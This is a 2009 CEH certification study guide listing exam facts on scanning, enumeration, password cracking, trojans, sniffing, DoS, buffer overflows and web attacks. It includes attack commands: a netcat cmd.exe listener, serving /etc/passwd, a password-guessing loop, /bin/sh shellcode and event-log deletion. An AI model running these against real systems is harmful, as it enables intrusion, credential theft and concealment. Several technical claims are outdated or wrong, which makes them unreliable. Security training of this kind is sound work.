2009 C|EH Study Guide
Parameter Security 12/1/2009
C|EH Study Guide Table of Contents CEH v6 Study Guide....................................................................................................................................... 4 Introduction to Ethical Hacking ................................................................................................................ 4 Footprinting .............................................................................................................................................. 5 Scanning .................................................................................................................................................... 7 Enumeration ........................................................................................................................................... 12 System Hacking ....................................................................................................................................... 12 Trojans and Backdoors ............................................................................................................................ 16 Sniffers .................................................................................................................................................... 16 Denial of Service ..................................................................................................................................... 17 Session Hijacking ..................................................................................................................................... 18 Buffer Overflows ..................................................................................................................................... 19 Hacking Web Servers .............................................................................................................................. 20 Web Application Vulnerabilities ............................................................................................................. 21 Web Based Password Cracking ............................................................................................................... 22 Linux Hacking .......................................................................................................................................... 22 Cryptography .......................................................................................................................................... 23 SQL Injection ........................................................................................................................................... 24 Hacking Wireless Networks .................................................................................................................... 25 Viruses ..................................................................................................................................................... 25 Evading IDS, Firewalls, and Honeypots ................................................................................................... 26 Social Engineering ................................................................................................................................... 28 Physical Security...................................................................................................................................... 28 Attack Analysis ............................................................................................................................................ 29 Attack #1 ................................................................................................................................................. 29 Attack #2 ................................................................................................................................................. 29 Attack #3 ................................................................................................................................................. 30 Attack #4 ................................................................................................................................................. 31 Attack #5 ................................................................................................................................................. 31 Attack #6 ................................................................................................................................................. 31 Attack #7 ................................................................................................................................................. 32 Attack #8 ................................................................................................................................................. 33 Hacker University
Page 2
C|EH Study Guide Attack #9 ................................................................................................................................................. 34 Attack #10 ............................................................................................................................................... 36 Attack #11 ............................................................................................................................................... 37 Attack #12 ............................................................................................................................................... 38 Attack #13 ............................................................................................................................................... 38 Attack #14 ............................................................................................................................................... 39 Attack #15 ............................................................................................................................................... 39 Labs ............................................................................................................................................................. 40 Footprinting ............................................................................................................................................ 40 Scanning .................................................................................................................................................. 41 Enumeration ........................................................................................................................................... 42 System Hacking ....................................................................................................................................... 42 Trojans and Backdoors ............................................................................................................................ 43 Sniffers .................................................................................................................................................... 44 Denial Of Service ..................................................................................................................................... 45 Session Hijacking ..................................................................................................................................... 46 Buffer Overflow....................................................................................................................................... 52 Hacking Web Servers .............................................................................................................................. 55 Web Application Vulnerabilities ............................................................................................................. 55 Linux Hacking .......................................................................................................................................... 56 SQL Injection ........................................................................................................................................... 57 Wireless Hacking ..................................................................................................................................... 60 Viruses ..................................................................................................................................................... 60
Hacker University
Page 3
C|EH Study Guide
CEH v6 Study Guide Introduction to Ethical Hacking 1. The five steps of malicious hacking are: Reconnaissance Scanning Gaining Access Maintaining Access Covering Tracks 2. Active attacks are typically more intrusive and therefore more easily detected. 3. Passive attacks include information gathering through web search engines, DNS queries etc. Note: scanning the range of IP addresses found in a company’s DNS database is NOT passive footprinting. 4. A black hat hacker is malicious and is sometimes call a cracker. 5. A white hat hacker is an ethical hacker. An ethical hacker does it for defensive purposes and has permission. A whitehat hacker is an ethical hacker that runs tests, writes reports, and signs all legal non-disclosure documents prior to working on a test. 6. Hacktivism is hacking for social, political, and religious causes. 7. Black box testing is when you have no knowledge of a target. You are only given a company name. 8. White box testing is when you have full knowledge. 9. Gray box testing, also called internal testing, is when you perform attacks with a normal user account to see if you can escalate privileges. 10. Insiders are common sources of attacks. Examples of insiders include disgruntled employees, customers, suppliers, vendors, business partners, contractors, temps, and consultants. 11. A company is legally liable for the content of e-mail that is sent from its systems, regardless of whether the message was sent for private or business-related purposes. You cannot claim ignorance of the law to avoid prosecution. 12. Every company should have an Information Security Policy (ISP) that informs employees about what they are allowed to use the company’s systems for, what is prohibited, and what should happen if they break the rules. 13. The United States CANSPAM Act criminalizes the transmission of unsolicited commercial e-mail (SPAM) without an existing business relationship 14. The Computer Misuse Act 1990 is a United Kingdom (UK) law that makes hacking into an unauthorized network a felony. 15. The first step an attacker will take is to perform a reconnaissance of the remote target. Hacker University
Page 4
C|EH Study Guide 16. Educate everyone with books, articles, and training on risk analysis, vulnerabilities, and safeguards to bridge the gap between black hats and white hats. 17. Suicide hackers are those hackers that do not care about being caught. 18. The FBI investigates computer crimes involving e-mail scams and mail fraud using 18 U.S.C. 1030 Fraud and Related Activity in Connection with Computers. 19. An exploit takes advantage of vulnerabilities in a system in the pursuit of some objective.
Footprinting 20. Footprinting is the blueprinting of a security profile of an organization 21. Examples of footprinting tools include: SamSpade NSLookup Traceroute NeoTrace 22. NSLookup is a program to query Internet domain name servers. It is used to display DNS information. 23. Type the following to do a zone transfer with NSLookup: Nslookup (takes you into interactive mode) ls –d targetsite.com 24. Zone transfers allow you to list all DNS information for a domain 25. Below is an example of a log entry that shows a possible zone transfer: Mar 12 01:44:12 [3142]: IDS181/nops-x86: 12.55.180.48 -> 10.8.0.7:53 26. There are several types of DNS records: A – host record CNAME – alias MX – mail exchange (mail server) NS – name server SOA – start of authority 27. A DNS zone is a collection of domains. You can use tools such as NSLookup, Dig, Sam Spade, or Host to perform a zone transfer. 28. The highest priority MX record has the lowest number 29. A DNS SOA record will contain the following: Serial number – revision number (sometimes called ‘version’ number) Refresh – refresh interval for secondary DNS servers Retry – retry interval if zone transfer fails
Hacker University
Page 5
C|EH Study Guide
Expire – how long until the secondary server will hold onto the record if it does not receive an update (e.g., 604800 = one week) TTL – default TTL for client name resolution 30. A secondary name server will request a zone transfer from a primary name server when a primary SOA is higher than a secondary SOA. 31. Traceroute works by manipulating the TTL field to elicit a time exceeded in transmit message. It is commonly used to find the route to a target system. While it commonly uses UDP and ICMP, traceroute can use any protocol. Therefore, blocking ICMP and UDP is not enough to protect hackers from tracerouting into your network. There is no way to completely block tracerouting. 32. Dumpster diving is when you search through garbage, recycled paper, and other rubbish to collect information about a company. 33. The Netcraft web site is a passive tool that you can use to see the operating system a web server is using. 34. Archive.org allows you to retrieve an archive of a company’s web site. 35. There are five Regional Internet Registrars (RIRs): ARIN (North America) – used for .com addresses APNIC (Asia Pacific) LACNIC (South and Central America) - use for places like Panama RIPE (Europe, Northern Africa) AfNIC (Sub-Saharan Africa) –note: the test may not be updated to include AfNIC 36. Examples of passive footprinting include searching web sites, performing queries on search engines, and going through rubbish to find information. 37. Using Whois and Netcraft are considered passive scanning. 38. Hackers can use job postings to determine the operating systems and applications being used at a company. 39. Passive information gathering includes discovering which web domains a company is using. 40. You can use Google to determine if a company’s web site is linked by other sites. This is useful in footprinting. For example, to find all sites that have links to www.eccouncil.org, type link:www.eccouncil.org into Google. 41. You can search Google for different types of systems on the Internet. For example, to search for all BorderManager Proxy/Firewalls, type intitle:”BorderManager information alert”. 42. Technical information is often revealed in newsgroup postings. You can use NNTP websites to search for newsgroup postings by a target company. 43. You should not have an AD integrated DNS server for Internet domains.
Hacker University
Page 6
C|EH Study Guide Scanning 44. To discover what telephone numbers you can use to dial into a router, use a war-dialing tool with a range of phone numbers and look for a CONNECT response. 45. Once footprinting is completed, the next step is scanning. 46. Common war dialing tools include: THC-Scan ToneLoc TBA 47. Firewalking is a technique used to discover what rules are configured on a gateway. Sends packets to various ports (usually 1-1024) with the exact TTL of the target. You can use Hping2 to do firewalking. 48. An IDLE scan monitors the IP ID value of an idle host. If this value increments by more than one, then the port are open on a target system. 49. Windows machines do not respond to broadcast pings or pings directed at a network address. 50. A clue that someone is doing an SNMP walk on your system is seeing a series of items separated by periods in your log files. Example: system.SysName, system.sysObjectID 51. SNMP is a connectionless protocol that uses UDP port 161. The default passwords used by SNMP are private and public. 52. Cisco routers can protect against SNMP attacks by using access lists. For example, the following commands will only allow hosts on the 192.168.99.0/24 network to read and write information via SNMP. This configuration does not prevent someone from running a network sniffer and capturing returned traffic with the configuration file. It also does not prevent someone from sending a customized SNMP set request with a spoofed source IP address. access-list 1 permit 192.168.99.0 0.0.0.255 ! snmp-server community public RO snmp-server community private RW 1 53. An SNMP scanner will send SNMP requests to multiple IP addresses, trying different community strings, and waiting for a reply. If you get no reply, it could be that the SNMP server is not running, you have tried an invalid community string, or the machine is unreachable. 54. SNMP uses community strings that are transmitted in clear text and therefore are susceptible to sniffing. 55. TCP/IP Concepts The three-way handshake is SYN, SYN-ACK, ACK.
Hacker University
Page 7
C|EH Study Guide
You cannot spoof your IP address and successfully use TCP. The FIN flag is used to close a TCP connection when a host has no more data to transmit. However, a host can continue to receive data as long as the SYN sequence number of transmitted packets is lower than the packet segment containing the set FIN flag. The receiving host sets the window size which specifies the number of packets it will receive before sending an acknowledgement. 0xFFFFFFFFFFFF is the destination MAC address of a broadcast frame. In TCP communication, a host will set its acknowledgement number to the sequence number it just received plus one. For example, if a host just received sequence number 100, it will respond with acknowledgement number 101. There are 1024 well known ports (for this exam). 56. OS Fingerprinting is the process of determining the operating system of your target. Fingerprinting an operating system does not depend on patches that have been applied. With NMAP you can do OS fingerprinting with the -O command line switch. Queso is another tool that can be used for OS fingerprinting. 57. The default behavior of an NMAP scan is to do both an ICMP ping sweep (ICMP ECHO_REQUEST) and a TCP ACK ping sweep. 58. ICMP type/codes: Type 0 code 0 = Echo Reply (used with the ping command) Type 3 code 13 = Destination unreachable: administratively prohibited (this message is given by routers when a router is blocking ICMP) Type 8 code 0 = Echo (used with the ping command) Tyle 11 code 0 = Time exceeded Type 13 code 0 = Timestamp request Type 14 code 0 = Timestamp reply Type 17 code 0 = Address mask request Type 18 code 0 = Address mask reply 59. There are several methods of scanning with NMAP: Scan Type
NMAP Command
Bits set
Response from host when port is open
TCP Connect() SYN A.K.A stealth scan
Nmap –sT
SYN
SYN/ACK
Nmap –sS
SYN
SYN/ACK (SYN scans do not respond to SYN/ACKs)
Hacker University
Response from host when port is closed RST RST
Page 8
C|EH Study Guide FIN XMAS
Nmap –sF Nmap –sX
FIN -RST FIN/URG/ -RST PSH Null Nmap –sN None -RST 60. A fragmentation scan sends the probe packet and splits the TCP header over several packets to make it harder for packet filters to detect what is happening. 61. A TCP Connect scan is the most accurate and reliable. 62. The three inverse scans are FIN (FIN bit), XMAS (FIN/URG/PSH) and NULL (no bits). The inverse scans will report nothing for an open port and a RST for a closed port. Windows does not comply with the RFC and therefore will report all ports as closed when performing these scans. 63. SAINT is a vulnerability scanner that only works on Linux and UNIX. 64. Connect scans should be used when you need reliable and quick results but do not care about being stealth. 65. A distributed port scan operates by having multiple computers each scan a small number of ports, then correlating the results. 66. Many of the Nmap commands in Linux must be run under the context of the root administrator. For example, to run a ping scan against the 192.168.1.15 host, type „sudo nmap –sP 192.168.1.0/24‟. 67. A ping scan will produce results similar to the following: Host 192.168.1.1 appears to be up. MAC Address: 00:13:55:3F:1C:44 (Cisco-Linksys) Host 192.168.1.2 appears to be up MAC Address: 00:55:23:8D:00:1E (Compaq Computer) 68. Nmap will try to guess the operating system when it does a scan against a computer. Sometimes it is unable to detect the operating system. However, by looking at the open ports you can often determine what type of machine it is. For example, while there is no way for telling for sure, the following output is most likely a Windows Domain Controller because LDAP is open. 21/tcp open ftp 25/tcp open smtp 80/tcp open http 389/tcp open ldap 443/tcp open https Hacker University
Page 9
C|EH Study Guide 69. Stealth scans do not open a full TCP connection. 70. If you see someone trying to scan port 500 (ISAKMP), they might be trying to determine the type of VPN implementation you are using and checking for IPSec. 71. Nmap can be used to scan multiple networks. For example, the command nmap 215.55.12-13.* will scan 512 hosts. 72. If you are not getting a ping response using ICMP, it might be because ICMP is being blocked. Try HPING2 instead because it uses stealth TCP packets to connect instead of ICMP. 73. LDAP (TCP 389) and MS-SQL-S (TCP 1433) are ports that are often open on Windows 2000 servers. 74. Pings sweeps may not return results if: The host is down ICMP is being filtered The packet TTL value is too low The destination network is down 75. You can scan for protocols in use on a target by using the nmap –sO command. This will show up in a TCP dump with the words ip-proto-. 76. If pings and basic port scans fail, try using an inverse scan like XMAS. 77. LDAP uses port 389. 78. The –O switch in Nmap is used for OS detection. 79. If you see suspicious traffic on port 53, check to see if an attacker is trying to do a DNS zone transfer. 80. Netstat has a number of switches. The netstat –anb –p tcp command will return all listening ports as well as the files that use those ports. C:\netstat –anb –p tcp Active Connections
Proto
Local Address
Foreign Address
State
PID
TCP
0.0.0.0:135
0.0.0.0:0
Listening
125
C:\windows\system32\ws2_32.dll C:\windows\system32\RPCRT4.dll C:\windows\system32\rpcss.dll C:\windows\system32\svchost.exe
Hacker University
Page 10
C|EH Study Guide C:\windows\system32\ADVAPI32.dll [svchost.exe] 81. Hping2 has many options. The following command will generate a single TCP SYN packet with a source port of 2000, destination port 30, with a sequence number 15 spofing the IP address 172.16.0.5: Linux#hping2 –I ether0 –a 172.16.0.5 –s 2000 –p 30 –syn – c l –d 0xF00 –setseq 0x0000000f 10.0.0.1 82. Hping2 is a pinging tool and a packet assembler. Here’s another example of Hping2: #hping2 10.0.0.1 –seqnum –p 139 –S –I u1 –I eth0 HPING uaz (eth0 10.0.0.1) S set, 40 headers + 0 data bytes 2361294848 +2361294848 2411626596 +50331648 The first number is the sequence number and the second is the offset. 83. Floppyscan is a utility loaded on a floppy disk that will cause a Blue Screen of Death to appear on your monitor while it performs a port scan in the background. 84. The best defense against Hping2 attacks is to use stateful packet inspection on your firewalls. 85. You can specify ports to scan with nmap using the –p switch. For example, to scan the lower 1024 UDP ports, execute the following command: nmap –sU –p 1-1024 . 86. You can use Netcat to scan ports: nc –u 1-1024. 87. You can scan for IP protocols using the command nmap -s0. Look for the text “ip-proto” in tcpdump output to tell if someone is doing an IP protocol scan. 88. ACK scans are used to scan and enumerate the rule sets on firewalls. If a port is being filtered by a rule set you will get nothing back. If the port is not being filtered then you should get a RST. Responses to an ACK scan: UNFILTERED: RST FILTERED: (nothing) 89. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. 90. You cannot block a hacker from doing a FIN, NULL, or XMAS scan on your network. 91. The signature of attack for SYN Floods contains a large numbers of SYN packets appearing on a network without the corresponding reply packets. 92. SandTrap can be used to notify you if anyone tries to break into your PBX. 93. You cannot stop a hacker from launching FIN, NULL, or X-MAS scans on your network. 94. If you are concerned that someone could block your scans and you want to slow your scans down, try using the -T0 or -T1 switch to change the timing.
Hacker University
Page 11
C|EH Study Guide 95. In a UDP port scan, an open port will not respond and a closed port (e.g., a port not being used) will send an ICMP message stating that the port is unreachable. 96. A program that defends against a port scanner will attempt to update a firewall rule in real time to prevent the port scan from being completed. 97. Fragmentation scanning splits the TCP header over several packets to make it harder for packet filters to detect what is happening. 98. Port scanning is an information gathering attack. 99. Nessus is an automated vulnerability assessment tool that has a database containing signatures that is able to detect hundreds of vulnerabilities. One disadvantage of an automated vulnerability assessment tool is that it is noisy. 100. After doing a port scan you should connect to open ports to discover applications. 101. Static network address translation maps a single machine on an internal network to a single public IP address. 102. Look in %windir%\\system32\\drivers\\etc\services to find the port number for POP3 on your server. (Note: POP3 is used to receive e-mail).
Enumeration 103. If NMAP was unable to identify the operating system of a web server, telnet to an open port and grab the banner. 104. Enumeration tools include USER2SID, SID2USER, and DumpSec. 105. The SID ending in 500 is the built-in Administrator account. 106. If the Administrator account has been renamed but you still know the SID, you can use sid2user to find the new name of the Administrator account. 107. The default passwords (community-strings) in snmp are private (readwrite) and public (read-only). These community strings are sent in clear-text and is therefore susceptible to sniffer. 108. You should use SMB signing to protect against hackers modifying SMB packets and forwarding them. 109. If you must run an SMTP server, you cannot prevent people from using telnet to connect to port 25 on your e-mail server. 110. Hackers will often send a single SMTP message to an address that does not exist to gather information about internal hosts used in e-mail treatment. 111. To grab a banner of a web server, telnet to port 80 and type HEAD / HTTP/1.0. 112. An attacker may scan port 137 to check for file and print sharing on Windows systems.
System Hacking 113. If L0phtcrack is unable to capture any logons when attempting to sniff SMB exchanges, it could be that the network is using Kerberos. Hacker University
Page 12
C|EH Study Guide 114. Alternate Data Streams (ADS) is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer. 115. A hardware keylogger cannot be detected by anti-virus or anti-spyware products. 116. Hardware keyloggers, software keyloggers, and sniffers can all be used to capture passwords. 117. Snow is an example of a steganography utility that exploits the nature of white space and allows the user to conceal information in these white spaces. 118. Stealth Anonymizer can be used to bypass Internet monitoring systems. 119. The three password cracking techniques are dictionary, hybrid, and brute force. A dictionary attack compares the hashes with those in a dictionary file. A hybrid attack is a combination of both brute force and dictionary. A brute force attack is trying every combination of letters, numbers, upper case, lower case, and special characters. A dictionary attack is the fastest while a brute force attack takes the longest. Brute force is also your best option if random password generators are being used to create passwords for users. 120. You can always tell if a password has less than 8 characters because the hash will end with AAD3B435B51404EE. 121. You can use netcat to grab a password file. The syntax would be nc –l –u –p 1111 < /etc/passwd. 122. Hackers will often try to cover their tracks. If a hacker wanted to clear any records of brute force attempts, they would want to delete c:\windows\system32\config\SecEvent.Evt. 123. CACLS.exe is a command line tool that can be used to assign, display, or modify ACLs to files or folders. 124. You can use Pwdump to dump the SAM password hashes to a file. The syntax is pwdump > file.txt. 125. The last step an attacker will do in an attack to prevent being caught is to cover their tracks. 126. Windows 2000 server Syskey uses 128 bit encryption. This is considered an effective countermeasure to the weaknesses in Windows LM hashes (along with enforcing Windows complex passwords). 127. Best practices for password creation: Never use a password found in a dictionary Never use a password related to your hobbies, pets, relatives, or date of birth Never leave a default password Never use a password related to the hostname, domain name, or anything else that can be found with whois
Hacker University
Page 13
C|EH Study Guide 128. Windows LAN Manager (LM) hashes are converted to uppercase and split to give an effective length of 7 characters. 129. You should do the following when you introduce a new Windows computer onto your network: Patch the system by installing the latest service packs and hotfixes Configure Windows Update to be automatic Install a personal firewall and lock down unused ports from connecting to your computer Create a non-admin user with a complex password and logon to this account Install the latest anti-virus signatures Key applications should have the latest security patches installed 130. Alternate data streams are used to hide files inside of other files. Clue to spot ADS: file1.exe:file2.exe (two files separated by a colon) 131. You can crack passwords via the command line with the following command: for /f "tokens=1" %%a in (file.txt) do net use * \\10.0.0.1\c$ /user:"Administrator" %%a 132. Password cracking tools do not reverse the hash of a password to recover passwords. Instead, they hash words and compare it with the password's hash. 133. The best countermeasure against privilege escalation is to give each user the least amount of privileges. 134. MBSA is a patch management utility that scans one or more computers on your network and alerts you if any important Microsoft security patches are missing. 135. 14 character passwords do not take much longer to crack than 8 character passwords because LanManager hashes are broken up into two seven character fields. 136. Attacking well-known system defaults is on of the most common hacker attacks. Often the default location of installation files can be exploited which allows a hacker to retrieve a file from the system, many software packages come with “samples” that can be exploited, and many systems come with default user accounts with well-known passwords that administrators forget to change. 137. Image steganography hides information within picture files. 138. If you have remote users connecting in to a Windows Server 2003 Active Directory domain by using Challenge Handshake Authentication Protocol (CHAP), then you should enable the “Store password using reversible encryption for all users in the domain” setting in the Default Domain Group Policy. 139. One indication that you may be infected with a stealth kernel level rootkit is that you start to realize that your computer is not running as fast as it used to and your computer reports you have limited space on your hard drive 140. Steganography fits in the Hide Files step of the system hacking cycle.
Hacker University
Page 14
C|EH Study Guide 141. To protect your VoIP network that uses the operating system VxWorks on the phones, block UDP port 17185 at the firewall to prevent the OS default debugger program from communicating outside the network (note: the exam may incorrectly have this as TCP port 17185; just remember it is port 17185). 142. Kerberos uses port 88 (TCP/UDP) 143. Security tokens are a good choice for two-factor authentication. They are a hardware device that you can use along with a security or identifying pin number and are often less expensive than smart cards. 144. You can install screen capturing Spyware on someone’s computer to track someone’s activities online and send you an e-mail once a day to see what that person has been up to when they surf the web. 145. PDF passwords can be easily cracked. 146. If you notice your log file decreasing in size, you should log this as suspicious activity, continue to investigate, and take further steps according to your security policy. 147. You can use the Elsave utility to clear event logs. Winzapper will selectively erase event logs. 148. OutGuess is a steganography tool for JPG images; wbStego works with bitmaps. 149. GINA is the Graphical Identification and Authentication DLL that can be used to replace the login screen. 150. Challenge/response authentication is used to prevent replay attacks. 151. Mandatory access control uses sensitivity labels on information and compares them to the level of security a user is operating at. 152. Disable LM authentication in the registry on Windows XP. 153. John the Ripper can be used to crack a variety of passwords but the output does not show if the password is upper or lower case. 154. You should not respond to invalid usernames and passwords with Invalid Username and Invalid Password (this reveals too much information). 155. You can extract a Trojan from a standalone file with this syntax: C:\cat textfile.txt:Trojan.exe > Trojan.exe 156. The following command, when executed between two hosts, can generate huge amount of useless network data that you can use for performance testing: Machine 1 #yes XXXXXXXXXXXXXXXXXXXXXXXXXXXX | nc -v -v -l -p 55555 > /dev/null Machine 2 #yes ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ | nc machine1 55555 > /dev/null
Hacker University
Page 15
C|EH Study Guide Trojans and Backdoors 157. Use cryptcat instead of netcat if you want to encrypt your traffic. 158. A Trojan is a program masked inside another program (such as a game). You can often see the Trojan running in the background by looking in the Windows Task Manager. The process of hiding a Trojan or keylogger in another file is called wrapping. 159. You should compare a file's MD5 signature with the one published on the distribution media to make sure that the file is not infected with a Trojan. 160. To see what application executables are listening on ports, run the fport utility. 161. Example of snort log showing a Back Orifice attack: 04/20-13:04:45.01351 172.16.0.5:31337 -> 192.168.1.1:1025 162. To start a Netcat listener: nc –l –p -e cmd.exe –d 163. To connect to a Netcat listener: nc 164. Qaz is a Trojan that renames notepad to note.com. 165. DNS uses port 53 and is often used by backdoor programs because it is most likely open. 166. Hackers will often make their Trojans persistent by adding a registry entry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 167. Tripwire is an example of a file integrity verification tool that can be used to detect unauthorized changes or modification of binary files on a system. 168. You can use the Netstat command to see how many connections your computer is currently running. 169. Use the fport utility to look for applications that listen on certain ports. 170. Port 6667 is used by the Net-Devil Trojan. In hex, this is 0x1A0B.
Sniffers 171. You can get around switches by using ARP spoofing, MAC duplicating, and MAC flooding. ARP spoofing the default gateway is a common method to capture traffic when using a switched network. Without other techniques like MAC flooding or ARP spoofing, you will not be able to capture traffic on a switched network. Use ./macof to flood the port to MAC address table (CAM table). This will move the switch into broadcast mode and allow you to sniff all packets on the network. 172. Ettercap and Ethereal (now Wireshark) are popular sniffers. Sniffers work best on networks using hubs. To detach Ettercap from the console and log all sniffed passwords to a file, use the command: ettercap –NCLzs –quiet Ethereal allows for filters. For example, to create a display filter that only looks for the three-way handshake for a connection from host 172.16.0.4, the filter would be: ip.addr==172.16.0.4 and tcp.flags.syn Hacker University
Page 16
C|EH Study Guide 173. WinPCap is the name of the Windows Packet Capture library which must be installed in order to use a sniffer on Windows platforms. Many sniffers install this automatically for you. LibPCap is the equivalent for Linux. 174. The best options for preventing attackers from sniffing your passwords is to use Kerberos, Smart cards, and/or Stanford Secure Remote Password (SRP) 175. You can defend against ARP spoofing by: placing static ARP entries on servers, workstations, and routers Using the ARPWALL system Tuning IDS sensors to look for large amounts of ARP traffic on local subnets 176. Wireshark (ethereal) allows for filters. For example, to filter only packets with hotmail e-mail messages, use the filter (http = “login.passport.com”) && (http contains “POP3”). 177. TCPflow can be used to extract the application layer data from each TCP connection from a log file into separate files.
Denial of Service 178. A smurf attack is when you send a broadcast ping with a spoofed source address of your target. A fraggle is similar to a smurf attack but uses UDP. 179. A SYN flood is a DOS attack in which a large number of SYN packets appear on a network without the corresponding reply packets. 180. A LAND attack is when an attacker forges a TCP/IP packet, causing the victim to try and open a connection with itself. This causes the system to go into an infinite loop which, in turn, can slow down the system. 181. The following are techniques used to block against SYN flood attacks: Micro blocks: instead of allocating a complete connection object, simply allocate a micro-record. SYN cookies: instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as hash of the client’s IP address, port number, and other information. When the client responds with a normal ACK, the sequence number will be included which the server then verifies. RST cookies: An alternative to SYN cookies where the server sends a wrong SYN/ACK back to the client. The client should generate a RST packet telling the server that something is wrong, which informs the server that the client is valid. Stack tweaking: TCP attacks can be tweaked to reduce effects of SYN floods. For example, timeouts can be changed. 182. A Ping of Death attack sends fragmented ICMP packets that, when reconstructed, is larger than 65,536 bytes. 183. IDS devices are primary victims to smurf attacks.
Hacker University
Page 17
C|EH Study Guide 184. A denial of service attack prevents legitimate users from gaining access to a service. A distributed denial of service (DDoS) uses zombie hosts to launch an attack. 185. A Teardrop attack modifies offset values. 186. Ping sweeping your network may cause your IDS to report a smurf attack. To prevent these alarms, do not scan the broadcast IP address when scanning your network. 187. Hackers usually control Bots through IRC channels. The initial two commands that an IRC client sends to join an IRC network are USER and NICK. (note: technically, the PASS command comes first according to RFC 1459, but it is optional. Therefore, USER/NICK are the initial first two commands) 188. Network Based Application Recognition (NBAR) is a Cisco IOS mechanism that examines packets on Layers 4 to 7. It can be used to counter DDoS attacks and wormgenerated traffic by identifying malicious packets and dropping them. 189. Emsa Web monitor can be used to check on the status (uptime statistics) of your web server. 190. Make sure your router won’t take a directed broadcast to prevent smurf attacks. 191. Reflective DDoS attacks usually spoof the originating IP addresses and send the requests at reflectors. To detect reflectors on your network you should scan the network using Nmap for the services used by these reflectors 192. Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht are all DDOS tools 193. The following command may freeze a router: ping -l 56550 10.0.0.1 -t
Session Hijacking 194. To perform a session hijack, you must find the sessions, predict the sequence number, and take over the session. 195. Strong authentication is not enough to call your network secure because someone could always perform session hijacking to take over sessions that are already authenticated. This is the key advantage to session hijacking: taking over an already authenticated connection. 196. Hunt is a common session hijacking tool. It can intercept traffic then perform a man-in-the-middle attack (MiTM). 197. In a Man-in-the-middle (MiTM) attack, an attacker will intercept a transmission to copy and forward all packets between two hosts. 198. Using unpredictable sequence numbers will help secure against session hijacking. 199. TCP/IP session hijacking is carried out on the transport layer. 200. Challenge/response authentication is used to prevent session hijacking attacks. 201. Use unpredictable sequence numbers to secure sessions against hijacking. Hacker University
Page 18
C|EH Study Guide 202.
RFC 2827 helps defeat IP address spoofing.
Buffer Overflows 203. Canary words are a method used by compilers to send an alarm if a buffer overflow has been attempted. Canary adds NULL (0x00), CR (0x0d), LF (0x0a), and EOF (0xff). If they get altered when a function returns, an alarm is sent. 204. NOP sleds send a series of NO Operation instructions in an attempt to guess the return pointer. The hexadecimal value for NOPs is 0x90. 205. The following code is usually an indication of a buffer overflow attack: char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\ x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8 d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\ x62\x69\x6e\x2f\x73\x68"; 206. Buffer overflows can be exploited using such function calls as fgets(), scanf(), strcpy() and strncpy(). 207. Buffer overflows are due to programming errors and bad quality assurance practices. 208. Polymorphic shell code works by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode. 209. Two types of buffer overflows are heap based and stack based. 210. When writing shell code, be sure to remove any null bytes as that will end the string. 211. Buffer overflows will overwrite the ESP register with a return address of the exploit code. 212. The following pseudo code demonstrates the logic of stopping a stack from holding more than 200 characters in a buffer: IF (I > 200) then exit (1) 213. Many IDS devices will have signatures for common buffer overflow attacks. Attackers can get around this by using polymorphic shell code with a tool such as ADMutate to change the signature of their exploits. 214. Using printf(str) instead of printf(“%s”,str) may leave your program exposed to format string attacks. 215. Buffer overflows often try to exploit an application and launch a command shell. Below is an example of output from a network IDS of an attack that is trying to get a Linux command shell (/bin/sh):
Hacker University
Page 19
C|EH Study Guide
Hacking Web Servers 216. Setting your web pages to be read-only may prevent others from being able to deface them. 217. IIS runs in the context of the LocalSystem account. If a hacker successfully performs a buffer overflow attack against a default IIS installation on a Windows 2000 server, the hacker may be able to spawn a shell. The default privileges within the shell will be LocalSystem. 218. Hex encoded characters are commonly used to obstruct URLs. 219. Cookies can be session or permanent cookies. 220. IPP, Code Red, and ISAPI Indexing Services are all used in IIS buffer overflow exploits. 221. Some web sites use cookies to keep a user session active once a user has logged in. When a user logs in the application, a cookie can be sent to the client that may contain the user ID which is checked for access rights. A hacker can compromise a system that uses cookies by intercepting the communication between the client and the server and change the cookie to make the server believe that there is a user with higher privileges. 222. If you can access someone’s cookie, you can use parameter manipulation to alter the cookie to gain additional access. For example, if the cookie says ADMIN=no, you can change the parameter to say ADMIN=yes. 223. A DNS poisoning attack is when a hacker changes a DNS entry for a web site to point to their web server instead of the legitimate site. 224. Many systems come with default user accounts with well-known passwords that administrators forget to change.
Hacker University
Page 20
C|EH Study Guide 225. Often the default location of installation files can be exploited which allows a hacker to retrieve a file from the system. 226. Many software packages come with “samples” that can be exploited. 227. Attackers may be able to store a copy of your web page locally, change a ‘hidden’ price value in the source code, and submit an order in order to purchase products at a lower price. 228. Canonicalization is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another. 229. You can use the robots.txt file in the root of your website to define directories that you do not want crawled by WWW spiders. 230. One approach to secure against phishing scams is to use RSA SecureID based authentication systems along with one-time password lists. 231. Form scalpel can be used to dissect HTML forms.
Web Application Vulnerabilities 232. Use wget to download multiple web pages. 233. Web applications often have non-validated parameters, broken access control, broken session management, cross-site scripting, and buffer overflow vulnerabilities 234. Web applications can have several vulnerabilities, including visible clear text passwords, anonymous user account set at default, missing latest security patches, no firewall filters, and no SSL configured. 235. Cross-site scripting (XSS) attacks allows commands to be executed on your machine under you local privileges without installing any software. Web forums are often vulnerable to these kinds of attacks. A clue that cross-site scripting is being done is the tag. An example of a cross site scripting attack is when you click on a link in an e-mail message and are taken to a web based bulletin board where certain functions are executed on your local machine under your privileges without your knowing. Cross-site scripting attacks often try to grab a person’s cookie. To view your cookie via Javascript for a particular site, the code would be alert(document.cookie). The best way to protect against XSS attacks is to disable Javascript in IE and Firefox browsers. 236. Lynx is a scaled down, text-based, basic web browser that you can use when testing sites which you suspect may have malicious code on it. 237. Use HTTP SSLv3 to send data instead of plain HTTPS.
Hacker University
Page 21
